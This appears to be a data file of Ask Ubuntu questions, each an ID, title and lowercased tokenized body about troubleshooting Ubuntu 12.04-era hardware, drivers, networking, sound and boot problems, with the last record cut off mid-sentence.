133899	using pin instrumentation in ubuntu : error	i have used pin in ubuntu linux with 3.0.0-19-generic # 33-ubuntu smp x86_64 ; gcc version 4.6 and also in redhat 2.6.18-308.el5 # 1 smp x86_64 ; gcc version 4.7 however , i am trying to use it in ubuntu : linux info 2.6.35-32-server # 65-ubuntu smp x86_64 and getting error : /pin-2.10-45467-gcc.3.4.6-ia32_intel64-linux/ia32/bin/pinbin : no such file or directory the pin binary uses : machine=`uname -m` if [ $ machine == `` ia64 '' ] then exec `` $ origin '' /ia64/bin/pinbin `` $ { @ } '' else exec `` $ origin '' /ia32/bin/pinbin -p64 `` $ origin '' /intel64/bin/pinbin `` $ { @ } '' fi which surprises me , since machine is x86_64 . i do n't know why it compares with ia64 . can anyone help . thanks .
133903	internal microphone not listed in sound settings	on a fresh 12.04 installation in sound settings the internal microphone is not listed ( worked upto 11.10 ) . alsamixer shows that mic is `` 0 '' and muted , but after changing that it remains undetected in sound settings . any help ? could also be a bug ( https : //bugs.launchpad.net/ubuntu/+source/alsa-driver/+bug/990211 ) .
133908	how to mount ntfs drive to home folder ?	i have 300 gb ntfs drive with documents folder on it . is it possible to automount /media/300gb/documents to home/documents at system startup ? how can i do it ?
133910	can i remove starforce ?	i installed tm nation eswc wity wine-install want successful . but when running and presing `` play '' i got this : thanks for helping !
133911	wireless not working on an hp 4410s ?	since i upgraded to ubuntu 12.04 , my wifi stopped working . i have tried many fixes but nothing works . when i click on install additional drivers , no drivers show up saying `` no proprietary drivers are in use on this system '' wired connection works but wireless does n't work and no drivers detected . sudo lspci -nn 00:00.0 host bridge [ 0600 ] : intel corporation mobile 4 series chipset memory controller hub [ 8086:2a40 ] ( rev 07 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation mobile 4 series chipset integrated graphics controller [ 8086:2a42 ] ( rev 07 ) 00:02.1 display controller [ 0380 ] : intel corporation mobile 4 series chipset integrated graphics controller [ 8086:2a43 ] ( rev 07 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 [ 8086:2937 ] ( rev 03 ) 00:1a.1 usb controller [ 0c03 ] : intel corporation 82801i ( ich9 family ) usb uhci controller # 5 [ 8086:2938 ] ( rev 03 ) 00:1a.2 usb controller [ 0c03 ] : intel corporation 82801i ( ich9 family ) usb uhci controller # 6 [ 8086:2939 ] ( rev 03 ) 00:1a.7 usb controller [ 0c03 ] : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 [ 8086:293c ] ( rev 03 ) 00:1b.0 audio device [ 0403 ] : intel corporation 82801i ( ich9 family ) hd audio controller [ 8086:293e ] ( rev 03 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 82801i ( ich9 family ) pci express port 1 [ 8086:2940 ] ( rev 03 ) 00:1c.2 pci bridge [ 0604 ] : intel corporation 82801i ( ich9 family ) pci express port 3 [ 8086:2944 ] ( rev 03 ) 00:1c.4 pci bridge [ 0604 ] : intel corporation 82801i ( ich9 family ) pci express port 5 [ 8086:2948 ] ( rev 03 ) 00:1c.5 pci bridge [ 0604 ] : intel corporation 82801i ( ich9 family ) pci express port 6 [ 8086:294a ] ( rev 03 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 [ 8086:2934 ] ( rev 03 ) 00:1d.1 usb controller [ 0c03 ] : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 [ 8086:2935 ] ( rev 03 ) 00:1d.2 usb controller [ 0c03 ] : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 [ 8086:2936 ] ( rev 03 ) 00:1d.7 usb controller [ 0c03 ] : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 [ 8086:293a ] ( rev 03 ) 00:1e.0 pci bridge [ 0604 ] : intel corporation 82801 mobile pci bridge [ 8086:2448 ] ( rev 93 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation ich9m lpc interface controller [ 8086:2919 ] ( rev 03 ) 00:1f.2 ide interface [ 0101 ] : intel corporation 82801ibm/iem ( ich9m/ich9m-e ) 2 port sata controller [ ide mode ] [ 8086:2928 ] ( rev 03 ) 00:1f.5 ide interface [ 0101 ] : intel corporation 82801ibm/iem ( ich9m/ich9m-e ) 2 port sata controller [ ide mode ] [ 8086:292d ] ( rev 03 ) 84:00.0 ethernet controller [ 0200 ] : marvell technology group ltd. 88e8072 pci-e gigabit ethernet controller [ 11ab:436c ] ( rev 10 ) sudo lshw -class network *-network description : ethernet interface product : 88e8072 pci-e gigabit ethernet controller vendor : marvell technology group ltd. physical id : 0 bus info : pci @ 0000:84:00.0 logical name : eth0 version : 10 serial : 00:25 : b3:5a:95 : a7 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list rom ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=sky2 driverversion=1.30 duplex=full firmware=n/a ip=192.168.0.104 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:44 memory : d0600000-d0603fff ioport:2000 ( size=256 ) memory : d8900000-d891ffff rfkill list all 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : hp-bluetooth : bluetooth soft blocked : no hard blocked : no
133925	ubuntu 12.04 under vb 4.1.14 -- ping resolves domain , but wget fails	with a vanilla install of ubuntu 12.04 on a vanilla install of virtual box with nat on vb , my network settings seem to function incorrectly . what baffles me is that i can ping www.google.com , but i ca n't wget www.google.com . ping www.google.com ping www.l.google.com ( 74.125.226.17 ) 56 ( 84 ) bytes of data . 64 bytes from yyz06s05-in-f17.1e100.net ( 74.125.226.17 ) : icmp_req=1 ttl=49 time=28.3 ms vs. wget http : //www.google.com -- 2012-05-08 12:09:32 -- http : //www.google.com/ resolving www.google.com ( www.google.com ) ... 74.125.228.48 , 74.125.228.49 , 74.125.228.50 , ... connecting to www.google.com ( www.google.com ) |74.125.228.48|:80 ... failed : connection timed out . i am on a corporate network , so there might be firewall issues or other security settings that i am unaware of . but i find it strange that i sould be able to ping and not access http , since i can do both on the host system ( windows ) . amongst other questions : should i assign the same mac address to this virtual interface as the actual mac address of the host 's nw interface ? is this good or bad practice ? edit : $ nslookup google.com server : 127.0.0.1 address : 127.0.0.1 # 53 non-authoritative answer : name : google.com address : 74.125.226.72 name : google.com address : 74.125.226.68 name : google.com address : 74.125.226.71 name : google.com address : 74.125.226.69 name : google.com address : 74.125.226.70 name : google.com address : 74.125.226.66 name : google.com address : 74.125.226.67 name : google.com address : 74.125.226.64 name : google.com address : 74.125.226.73 name : google.com address : 74.125.226.65 name : google.com address : 74.125.226.78 edit 2 : is is possible that my vbox installation might be incomplete ? i do not have admin rights to my host system . the installation seems to have gone well ( i can install and run a virtual machine ) , but everytime i boot it tries to install something that i can not identify ( in true windows style ) and requires admin access , which i do not have . could this potentially be the cause of my networking issues ? note that when i open the list of network connexions it does include virtualbox host-only adapter - so some installation has taken place , but possibly not all that 's required .
133926	ubuntu 12.04 freezes pre-grub	i was running ubuntu 11.10 , and upgraded to 12.04 . after the system rebooted , it began exhibiting the following behaviour : 1 ) it loads the bios . i can access the bios menu , so i can select what piece of hardware the computer boots from if i need to . 2 ) the screen turns purple . 3 ) the screen turns black . mashing esc , del , etc does nothing after phase 1 ; in fact , the keyboard and mouse are totally unresponsive . i can not even turn numlock off and on . i tried loading from a super grub 2 disc , but while it can detect some two dozen kernels , none of them seem to load properly . i am booting from a live cd now , but i 'm not sure how i should go about fixing this .
133934	startup hangs at `` checking battery state '' even though i have no desktop and no battery	there are a bunch of other threads , and one with this exact question ( boot hangs after `` checking battery state ... '' ) is closed already ( this i think was not warranted ) , but i have n't solved my problem . why does ubuntu hang at `` checking battery state ... '' when i do n't even have a laptop or a battery ? i 'm using a desktop computer .
133942	radeon x800 pro driver 9-3-x86 error installing { need guidance or alternative drivers }	i 've recently started using ubuntu 12.04 lts 32bit on my computer , the graphics card of which is an old ati radeon x800 pro . i tried to install its video driver provided my amd which i downloaded from this link : http : //support.amd.com/us/gpudownloa ... 2 & lang=english that 's exactly the error which appeared in console : code : ati technologies linux driver installer/packager ================================================== error : ./default_policy.sh does not support version default : v2 : i686 : lib : :none:3.2.0-24-generic-pae ; make sure that the version is being correctly set by -- iscurrentdistro after googling the error i figured out that the version of ubuntu i have does not support this version of the driver , despite the fact that it is provided by amd for linux x86 ! i am not sure about the above conclusion of mine , so i would like to hear your opinion before i go searching for open source drivers { if you have any suggestions please go on } . in case you need to know the way i tried to install the driver using the .run file , i did the following : changed the file permissions to allow the file to be run as a program . in console , while being in the directory where the file was { downloads } i typed sudo ./ati-driver-installer-9-3-x86.x86_64.run
133946	are these sata errors dangerous ?	i 'm getting these errors ramdomly , and i do n't know if its normal or not . [ 39441.061856 ] ata3.00 : failed to read scr 1 ( emask=0x40 ) [ 39441.061866 ] ata3.01 : failed to read scr 1 ( emask=0x40 ) [ 39441.061892 ] ata3.15 : exception emask 0x10 sact 0x0 serr 0x280100 action 0x6 frozen [ 39441.061897 ] ata3.15 : irq_stat 0x08000000 , interface fatal error [ 39441.061904 ] ata3.15 : serror : { unrecovdata 10b8b badcrc } [ 39441.061910 ] ata3.00 : exception emask 0x100 sact 0x0 serr 0x0 action 0x6 frozen [ 39441.061917 ] ata3.01 : exception emask 0x100 sact 0xe serr 0x0 action 0x6 frozen [ 39441.061923 ] ata3.01 : failed command : read fpdma queued [ 39441.061933 ] ata3.01 : cmd 60/a8:08 : b0:48:62/00:00:00:00:00/40 tag 1 ncq 86016 in [ 39441.061940 ] ata3.01 : status : { drdy } [ 39441.061944 ] ata3.01 : failed command : read fpdma queued [ 39441.061953 ] ata3.01 : cmd 60/a8:10 : b0:49:62/00:00:00:00:00/40 tag 2 ncq 86016 in [ 39441.061959 ] ata3.01 : status : { drdy } [ 39441.061963 ] ata3.01 : failed command : read fpdma queued [ 39441.061972 ] ata3.01 : cmd 60/58:18:58:4a:62/00:00:00:00:00/40 tag 3 ncq 45056 in [ 39441.061978 ] ata3.01 : status : { drdy } [ 39441.061987 ] ata3.15 : hard resetting link [ 39441.608302 ] ata3.15 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) [ 39441.609090 ] ata3.00 : hard resetting link [ 39441.929246 ] ata3.00 : sata link up 3.0 gbps ( sstatus 123 scontrol 320 ) [ 39441.929333 ] ata3.01 : hard resetting link [ 39442.249184 ] ata3.01 : sata link up 3.0 gbps ( sstatus 123 scontrol 320 ) [ 39442.263242 ] ata3.00 : configured for udma/133 [ 39442.277570 ] ata3.01 : configured for udma/133 [ 39442.277725 ] ata3 : eh complete i 'm also pasting smartctl -a for sda , sdb and sdc . thanks in advance for your help .
133956	upgraded to 12.04 , ca n't login because home directory disappeared	i have just upgraded from 11.10 to 12.04 , and at my first login , i typed in my password , and then a quick console screen showed that some mountall event failed . indeed , i had some networked filesystems with mounting point /home/here that seemed to no longer exist , creating the problem . so the screen shortly turns black and the system gets back to the login screen , playing the drum sound . alternatively , when i log in from e.g . tty1 , i have a no directory , logging in in with home=/ message . did i just loose all my data ? is there a way to get back to my home and data ? !
133961	12.04 does n't accept shutdown command	when i try to shutdown my machine using the normal shutdown menu it just logs off the current user and brings me back to the lightdm login window . i have to open a terminal and execute `` shutdown -h now '' to shutdown my system . any help ? edit : i noticed this behavior only occurs when i was previously switching users on my pc i.e . the 'guest-session ' is still running in the background .
133970	apple magic trackpad aftrer upgrade from ubuntu 11.10 to ubuntu 12.04 ( 64 bit ) - multitouch not working !	the title describes my problem . on ubuntu 11.10 multi-touch worked fine on my apple magic trackpad . now i have only `` one-finger-control '' . scrolling is only possible on the right side of the pad with one finger . three or four fingers are also not working any more ( four fingers to to get the dash or three fingers to move a window ) . what could i do to get this working again ? ? ( on 12.04 )
133971	computer started crashing during wine/gaming and videos - now crashes at any moment	up until 2-3 months ago i had no computer crashing issues with my c2d/6600 gt rig ( ive had it for 4-5 years ) . i 've been running 10.04 lts - lucid lynx for 1-2 years and have had no crashing issues whatsoever . i 'm not a gamer , but a few months ago i decided to spontaneously play warcraft 3 on wine , and so i started playing it . i had no issues at the start but after awhile it started artifacting in-game - i would see weird random graphic displayage , and after awhile my computer started crashing . the crashing got worse , and i think this killed my video card . prior to playing wc3 on wine , i 've never had any crashing issues whatsoever ; but afterwards my computer started crashing during in-browser flash playing ( youtube , etc ) . about 3 weeks ago i replaced my 6600 gt with a gt 430 . most of the time i still crash on wc3 through wine , but there are times where i can play 3-4 hours without crashing at all , and no artifacting whatsoever . the inside of my computer is very dusty , but since i replaced the video card with a new one , does that not cancel the video card out ? unless my gt 430 is faulty ? ( i doubt it 's that ) i have a feeling it 's temperature related - i 've had the same processor for 5 years . could it be overheating ? here are the temps after startup and 10 mins of playing a flash video : the gpu seems to be fine but the cpu cores seem to get to 58*c - the graphics of course display red but is n't this normal ? random question : should i reapply arctic silver on my cpu after only having applied it on initial cpu setup ? would appreciate any insight . i 'll try to debug this more by looking at the temps when running a game and/or high quality video . tldr version : had 6600gt/c2d e6300 for a long time . had no issues . started playing wc3 on wine , started getting artifacts , could see artifacts in bios and in games . computer started crashing during flash video playing , game playing , even at random times not even running anything heavy ( like 3 mins after startup ) replaced 6600gt with gt 430 - i do n't get artifacting in bios or games anymore but my computer still crashes . let me know if more information is necessary . edit : computer just crashed during the creation of this question . specs : nvidia drivers are 195.36.24 gigabyte ga-g31m-es2l lga 775 intel g31 micro atx intel motherboard g.skill 4gb ( 2 x 2gb ) 240-pin ddr2 sdram ddr2 800 ( pc2 6400 ) dual channel kit desktop memory model f2-6400cl5d-4gbpq intel core2duo e6300 box core2duo 1.86ghz @ 1066fsb evga gt 430 antec smartpower 350w 3 hard drives @ sata edit # 2 : maybe i should think of upgrading my psu ? edit # 3 : by `` crash '' i mean the computer freezes - everything stays as is , just nothing is usable . it does n't go into any black screen or blue screen of death . one note is that sometimes , if it crashes on a video thats being played , the audio will still play and the mouse will work but everything else is `` frozen '' - and after about 15 seconds of that both the mouse and audio 'freeze ' . so i actually meant to use freeze , not crash .
133984	is it possible or a good idea to run a more or less secure minecraft server without having pre-experience in ubuntu ?	hello dear ubuntu questions community , this is my first on this site and is very important to me ! i currently run a minecraft server that runs on a server that i have to move aways from , and that in the next few days , because of many different reasons ! now i planned to host the server on a linux based machine in a datacenter ! the problem i currently have is , that i am a newbie regarding ubuntu servers ! now my greatest concern is security : how much can go wrong , is it likey ? and what could happen ? what i would require : an ubuntu server that only ( at first ) hosts the minecraft server ! that is the minimum ! everything else can be done later . also good would be a mysql server for the databaseses ... ( but expandable ) later on , a lamp server would be nice , but that is , as said , no current necessity ! now , how unsecure could that be ? what would i have to do , other then installing java and starting the server on the server ? ... or does anyone know a step-by-step guide ? ... please give me an answer regarding that topic , i would be really glad ! thank you very much in advance ! ps : please do n't give me a standard `` do n't touch servers as a noob '' post ... i got enough of those ... i need facts , that i can orientate with ! !
133986	sound not working unless starting pulseaudio from the command line	on my system , audio settings show no available sound card . however , as soon as i start pulseaudio from the command line , everything works . output from pulseaudio : libudev : udev_device_new_from_syspath : device 0x1e47f30 has devpath '/devices/virtual/sound/timer' libudev : udev_device_new_from_syspath : device 0x1e47f30 has devpath '/devices/virtual/sound/seq' libudev : udev_device_new_from_syspath : device 0x1e47f30 has devpath '/devices/pci0000:00/0000:00:1b.0/sound/card0' libudev : udev_device_new_from_syspath : device 0x1e47f30 has devpath '/devices/pci0000:00/0000:00:1b.0/sound/card0/pcmc0d7p' libudev : udev_device_new_from_syspath : device 0x1e47f30 has devpath '/devices/pci0000:00/0000:00:1b.0/sound/card0/pcmc0d2c' libudev : udev_device_new_from_syspath : device 0x1e47f30 has devpath '/devices/pci0000:00/0000:00:1b.0/sound/card0/pcmc0d3p' libudev : udev_device_new_from_syspath : device 0x1e47f30 has devpath '/devices/pci0000:00/0000:00:1b.0/sound/card0/pcmc0d0p' libudev : udev_device_new_from_syspath : device 0x1e47f30 has devpath '/devices/pci0000:00/0000:00:1b.0/sound/card0/pcmc0d0c' libudev : udev_device_new_from_syspath : device 0x1e47f30 has devpath '/devices/pci0000:00/0000:00:1b.0/sound/card0/hwc0d3' libudev : udev_device_new_from_syspath : device 0x1e47f30 has devpath '/devices/pci0000:00/0000:00:1b.0/sound/card0/hwc0d2' libudev : udev_device_new_from_syspath : device 0x1e47f30 has devpath '/devices/pci0000:00/0000:00:1b.0/sound/card0/controlc0' libudev : udev_device_new_from_syspath : device 0x1e37f40 has devpath '/devices/pci0000:00/0000:00:1b.0/sound/card0' libudev : udev_device_read_db : device 0x1e37f40 filled with db file data libudev : udev_device_new_from_syspath : device 0x1e39240 has devpath '/devices/pci0000:00/0000:00:1b.0/sound/card0' libudev : udev_device_new_from_syspath : device 0x1e39570 has devpath '/devices/pci0000:00/0000:00:1b.0/sound/card0' libudev : udev_device_new_from_syspath : device 0x1e39560 has devpath '/devices/pci0000:00/0000:00:1b.0/sound/card0' libudev : udev_device_new_from_syspath : device 0x1e39560 has devpath '/devices/pci0000:00/0000:00:1b.0/sound/card0' libudev : udev_device_new_from_syspath : device 0x1e39560 has devpath '/devices/pci0000:00/0000:00:1b.0/sound/card0' libudev : udev_device_new_from_syspath : device 0x1e3f270 has devpath '/devices/pci0000:00/0000:00:1b.0/sound/card0' libudev : udev_device_read_db : device 0x1e3f270 filled with db file data libudev : udev_device_new_from_syspath : device 0x1e40e70 has devpath '/devices/pci0000:00/0000:00:1b.0/sound/card0' libudev : udev_device_read_db : device 0x1e40e70 filled with db file data libudev : udev_device_new_from_syspath : device 0x1e42290 has devpath '/devices/pci0000:00/0000:00:1b.0/sound/card0' libudev : udev_device_read_db : device 0x1e42290 filled with db file data libudev : udev_device_new_from_syspath : device 0x1e45a00 has devpath '/devices/pci0000:00/0000:00:1b.0/sound/card0' libudev : udev_device_read_db : device 0x1e45a00 filled with db file data output from lspci : 00:1b.0 audio device : intel corporation 82801jd/do ( ich10 family ) hd audio controller ( rev 02 ) ubuntu 12.04 lts precise , upgraded from lucid lts . worked out of the box on lucid .
133991	how can i write hfs partitions ?	i have an imac late 2009 with os x lion and ubuntu 12.04 . i want to exchange files between mac and linux without creating a partition or using a usb , so , the question is simple : which app should i have for writing in my hfs ( + ) partition ? i tried to disable journaling lots of times , saying it was done , but it does n't seems to work ... : /
133992	windows 7 removed grub	currently i have ubuntu 12.04 . i want to install win7 together with ubuntu . i know that if perform a install of windows , win will take the boot loader and will give me only option to select windows . if i can dual boot them together , and not loose ubuntu , how to do that ?
133993	how can i prevent specific updates from appearing in update manager 's list of updates in ubuntu 12.04 ?	i am using ubuntu 12.04 . when i open update manager it comes up with the updates . some of the updates that are listed are either not relevant to me or i just do n't want them . if i untick them , they just reappear the next time the update manager is used . if i decide i do n't want or do n't need an update , how can i stop the update manager from including it in the list of updates the next time it is used ?
133996	shortcut to terminal/bash script without 'instant close '	i 've created a desktop entry in ~/.local/share/applications . it looks similiar to the following : [ desktop entry ] version=1.0 encoding=utf-8 name=crontona server genericname=ca server comment=bdaf server for crontona exec=bash `` /usr/local/crontona/run.sh '' icon=/usr/local/crontona/app.ico terminal=true type=application it show 's up in the unity launcher and everything , but whenever i click it , the terminal just pops up but instantly closes . i have no problems at all with using 'bash ./ ... ..run.sh ' but i 've had no success through the menu . any idea why it happens ? this is the content of the run.sh file : # ! /bin/bash ./corona_run -prot tcp +maxcon 16
134002	ati hd 6400m /intel hd300 ubuntu 12.04 opengl problem	after installing ati catalyst i ca n't run unity 3d on integrated intel graphics . on dedicated everyting runs ok , the only problem is it looks like it does n't support opengl vertext buffer . unity test : /usr/lib/nux/unity_support_test -p opengl vendor string : tungsten graphics , inc opengl renderer string : mesa dri intel ( r ) sandybridge mobile opengl version string : 1.4 ( 3.0 mesa 8.0.2 ) not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : no gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no my xorg : section `` serverlayout '' identifier `` aticonfig layout '' screen 0 `` aticonfig-screen [ 0 ] -0 '' 0 0 endsection section `` module '' load `` glx '' endsection section `` monitor '' identifier `` aticonfig-monitor [ 0 ] -0 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` device '' identifier `` aticonfig-device [ 0 ] -0 '' driver `` fglrx '' busid `` pci:1:0:0 '' endsection section `` screen '' identifier `` default screen '' defaultdepth 24 endsection section `` screen '' identifier `` aticonfig-screen [ 0 ] -0 '' device `` aticonfig-device [ 0 ] -0 '' monitor `` aticonfig-monitor [ 0 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection i ca n't find any solution to this problem . thank you for all support !
134005	thunderbird wo n't load in ubuntu 12.04	can anyone tell me why my thunderbird wo n't load in my newly upgraded ubuntu 12.04 . the error message seems to point to addons but i can not get it loaded to look at them . if i compose a new message on its own i can get into the preferences and then to the manage addons - it trys to load them and then drops out .
134007	how to downgrade thunderbird 12.04 to thunderbird 11.01.1 on ubuntu 10.04.4 lts	on several ubuntu 10.04.4 lts systems i 've recently upgraded to thunderbird 11.01.1 to 12.04 via `` apt-get update/upgrade '' . now my t-bird menu 's drop off un-expectantly ; trying to click on `` get mail '' sometimes fails intermittently ; and printing is also intermittent . i did not have these intermittent problems before upgrading . how do i revert thunderbird to the previous release until the developers fix these issues ?
134009	wifi problems when i use bluetooth on my laptop	whenever i use my bluetooth on my laptop , which is almost always since i use a bluetooth mouse , my internet speed falls to 1mb/s in the internet panel and almost nothing loads . i 'm using the iwlwifi drivers . if i try to reconnect , it does n't work - only disabling my laptop mouse works . if i keep bluetooth on and not use any bluetooth devices it does work . how can i fix this ? these problems only occur on my laptop when running ubuntu . note that both bluetooth and wifi work fine , only that once i try to use both , i lose my wifi connection .
134015	cpu spikes when monitor shuts off	on my laptop , whenever the computer is idle a period of time ( 10 minutes i think ) the monitor shuts off . at this time the cpu usage spikes , i know this because the fan starts going crazy . when i move the mouse , the process immediately dies and cpu usage returns to normal . i 've tried to monitor what is running using htop and it appears to be compiz , but this could be an artifact of waking up and not what is causing the problem . i 'm running ubuntu 12.04 and have an ati graphics card ( 5400 series i believe ) . i 'm fairly certain the drivers are up to date . my question : how can i find out what is running ? or how can i fix this problem ?
134016	screen resolution set too high	i have just upgraded from natty to precise . the lcd monitor is connected through a belkin kvm switch . when ubuntu boots , everything is fine and the monitor comes up at it 's max resolution 1280x1024 . when i switch away using the kvm and then come back some time later , the monitor reports that the resolution is too high and presents only a blanked screen . xrandr shows that the video adapter is capable of 1600x1600 , but the display device is not . i think that when the screen blanks while the kvm is switched to another session and then is restored , it is trying to go to 1600x1600 and hence is not supported . the only way for me to recover is to hard reboot . i have not been able to find any way to configure the system so it will never try to use a resolution higher than 1280x1024 . anyone have any suggestions ?
134017	workspace switching not working with 12.04 and gnome classic with effects	i have configured 4 workspaces in gnome classic without effects , and this seems to work . when i log in with gnome classic with effects ( compiz ) i also see 4 workspaces in the panel but when i click on the second workspace just the background image is shown . there seems no way out of this background only workspace other then ctrl-alt-f1 and restarting the window manager .
134019	shank installation problem	after several attempts i was not able to install shank.i 've download the bin and .deb ( for 64bit architecture ) files . the bin shows this message on launch : `` no such file or directory '' . the deb not installed correctly . if someone managed to find a solution or workaround to install this game i hope will help me too . thanks for your time and support .
134021	keyboard light hotkey ( fn + f3 and f4 ) rarely work on an asus g60j	im using ubuntu 12.04 , and my laptop is an asus g60j . specifications : ubuntu 12.04 64bit intel i7 720qm nvidia gtx 260m 4gb ram the laptop always start with the keyboard backlit on . the hotkeys sometimes work , sometimes do n't . generally they always work to turn on the lights , but it is very hard to turn them off . it is really annoying because when the laptop suspend the keyboard remains turned on . i would like to know what file manage the fn events so i can try to figure it out . any kind of help is appreciated .
134023	file system is not clean ( the partition is misaligned by 1024 bytes )	after trying ubuntu for years and finding it too complicated the latest 12.04 got me intrigued . but after installing the disk utility is giving me this error . i 've searched here and there for a solution but they all seems to complicated for me . is there a simple answer or do i have to repartition and reinstall all ? yours sincerely kim hansen , denmark . disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0xaa9693fe device boot start end blocks id system /dev/sda1 2048 52430847 26214400 1c hidden w95 fat32 ( lba ) /dev/sda2 * 52430848 315301800 131435476+ 7 hpfs/ntfs/exfat /dev/sda3 315301886 975836294 330267204+ f w95 ext 'd ( lba ) partition 3 does not start on physical sector boundary . /dev/sda5 443142144 975836294 266347075+ 7 hpfs/ntfs/exfat /dev/sda6 315301888 430755839 57726976 83 linux /dev/sda7 430757888 443135999 6189056 82 linux swap / solaris partition table entries are not in disk order disk /dev/sdb : 7948 mb , 7948206080 bytes 81 heads , 10 sectors/track , 19165 cylinders , total 15523840 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x06ebddd7 device boot start end blocks id system /dev/sdb1 8192 15523839 7757824 7 hpfs/ntfs/exfat
134024	why are some updates not installable ?	whenever update manager runs , i am always left with these three options : they are obviously all related to evolution , which does appear to still be installed , but i have never used it . this has happened ever since i upgraded to 11.10 ( i am now on 12.04 ) why do these items appear and how can i remove them ?
134025	keyboard gets sluggish after a while ( after upgrade from 11.10 to 12.04 )	keyboard gets sluggish a while after login . originally reported a few weeks ago here : http : //ubuntuforums.org/showthread.php ? p=11869633 short recap : at a random time after login ( never less than half an hour so far ) , approximately once every other day ( after upgrading 6 weeks ago ) , the keyboard stops responding as usual . it seems that the initial keypress is disregarded , but key registers after the repeat-interval and then repeats as usual - i.e . i press a key and wait and the key registers and repeats just as it would before the bug appears except the first keypress is not registered . i can not trigger this bug `` at will '' , and i see no traces of errors in any error log . m , y question : do you have a suggested workaround for this issue until the bug is fixed ?
134029	ca n't install ubuntu since 10.10	when i try to install ubuntu on my notebook from a disk , i get the screen that asks be what i want to do , ( boot live , install etc ) ... no matter what i do , when i get to the point where i select an option , the disc will start to load , i will see the little man a circle with the keyboard under him , and then shortly after i get this screen : i have been having this problem since version 10.10 . 10.04 worked , and ever since the 10.10 , i 've tried the new versions and they all give me the same error . i really love ubuntu , and i want to use it as my main os , but this issue prevents me from using it as something other than a virtual machine ( which works ) . i 've tried the following things to resolve this problem . tried 32bit and 64 bit os' tried multiple download iso's tried multiple installation versions tried upgrading from version 10.04 with this , i get an error on the upgrade , my upgrade process freezes , and no key combination will undo the freeze . i have updated my bios to the newest version . run hardware diagnostics on my machine . looked for bios options to specify video card / cpu video allocation ( there 's no options for anything like this on my bios ) i have tried installing fedora 15-16 , and i get the same problem . googled the world for a solution , and come up empty . here are the important specs of my notebook asus g51jx intel® core™ i7 720qm 4gb ddr3 ram nvidia® geforce® gts 360m 1gb gddr5 vram more here if you need thanks to anyone who can help . i really want to get using ubuntu as my main os again .
134033	laptop monitor stopped working and ca n't be re-enabled on a dell latitude e6410	i 'm using ubuntu 12.04 ( upgraded from 11.10 ) , everything seemed to work fine until today when my laptop monitor suddenly stopped working . here are the facts : my laptop is a dell latitude e6410 , intel graphics . external monitor is attached through a docking station . everything worked fine for about 6-7 month , then upgraded to 12.04 issue started today after a week of upgrade . i think the issue started after i ran counterstrike 1.6 , both monitors blinked and then only the attached monitor which is connected to a docking station continued to work i thought at first that was a transient issue but then i 've rebooted , removed the battery but the same happens . laptop monitor and external monitor work fine up to login screen , but after i login it goes black whenever i try to re-enable laptop monitor from display manager i get errors : the selected configuration for displays could not be applied could not set the configuration for crtc 63 not sure what technical details are required but here are some : $ xrandr screen 0 : minimum 320 x 200 , current 3120 x 1050 , maximum 8192 x 8192 edp1 connected ( normal left inverted right x axis y axis ) 1440x900 60.0 + 40.0 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 connected 1680x1050+0+0 ( normal left inverted right x axis y axis ) 474mm x 296mm 1680x1050 60.0*+ 1280x1024 75.0 60.0 1152x864 75.0 1024x768 75.1 60.0 800x600 75.0 60.3 640x480 75.0 60.0 720x400 70.1 dp1 disconnected ( normal left inverted right x axis y axis ) hdmi2 disconnected ( normal left inverted right x axis y axis ) dp2 disconnected ( normal left inverted right x axis y axis ) $ tail /var/log/xorg.0.log [ 8367.132 ] ( ww ) intel ( 0 ) : flip queue failed : device or resource busy [ 8367.132 ] ( ww ) intel ( 0 ) : page flip failed : device or resource busy [ 8367.174 ] ( ww ) intel ( 0 ) : flip queue failed : device or resource busy [ 8367.174 ] ( ww ) intel ( 0 ) : page flip failed : device or resource busy [ 8367.174 ] ( ww ) intel ( 0 ) : flip queue failed : device or resource busy [ 8367.174 ] ( ww ) intel ( 0 ) : page flip failed : device or resource busy [ 8367.265 ] ( ww ) intel ( 0 ) : flip queue failed : device or resource busy [ 8367.265 ] ( ww ) intel ( 0 ) : page flip failed : device or resource busy [ 8367.265 ] ( ww ) intel ( 0 ) : flip queue failed : device or resource busy [ 8367.265 ] ( ww ) intel ( 0 ) : page flip failed : device or resource busy i 'm using gnome-shell , and the only ways i 've been able to get both display working have been : 1 ) booting with laptop disconnected from docking and then re attach external with vga instead of dvi , but only worked for a session . 2 ) removing xserver-xorg-video-intel , but then i gnome-shell is gone as well as dri i would appreciate any suggestions . regards , ============================= workaround found ============================= so i have tried few things and here is what worked : i 've installed a newer version of xserver-xorg-video-intel ( 2.19 vs 2.17 ) from ppa : xorg-edgers/ppa , it did n't work at first , it was only showing low graphics mode , so i tried 